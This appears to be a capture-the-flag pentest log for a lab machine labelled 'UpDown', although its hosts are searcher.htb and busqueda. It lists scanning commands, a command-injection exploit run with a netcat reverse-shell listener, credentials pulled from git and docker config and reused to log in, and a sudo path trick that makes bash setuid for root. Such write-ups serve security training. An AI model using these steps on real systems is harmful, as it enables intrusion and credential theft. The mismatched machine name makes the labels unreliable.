UpDown
๐งช Pentest Log: {{date:2025-08-03}}
๐ Target Information
- Machine Name: UpDown
- IP Address: 10.129.227.227
- Operating System: Linux
ip=10.129.227.227
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://$ip
wpscan -url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection
nc -lvnp 9001
./exploit.sh http://searcher.htb 10.10.14.25
๐งฌ Privilege Escalation
๐ค Current Access
- User: svc
- Groups: svc
- Shell Type: web shell
๐ Enumeration
Git:
cat .git/config
found
url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
Reuse the password, we successfully ssh in with svc
ssh svc@$ip
Sudo:
sudo -l
found
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960873171e2e
put the output data to jq, then found another password
"GITEA__database__NAME=gitea",
"GITEA__database__USER=gitea",
"GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
go to gitea.searcher.htb, login as administrator with the password just found, we are able to view the system-checkup.py source code
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Sudo Misconfiguration
- Target Binary/Service: system-checkup.py
- Reference / Source: N/A
๐ง Exploit Steps
- Smash to root
cd /tmp
vim full-checkup.sh
#! /bin/bash
chmod +s /bin/bash
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
bash -p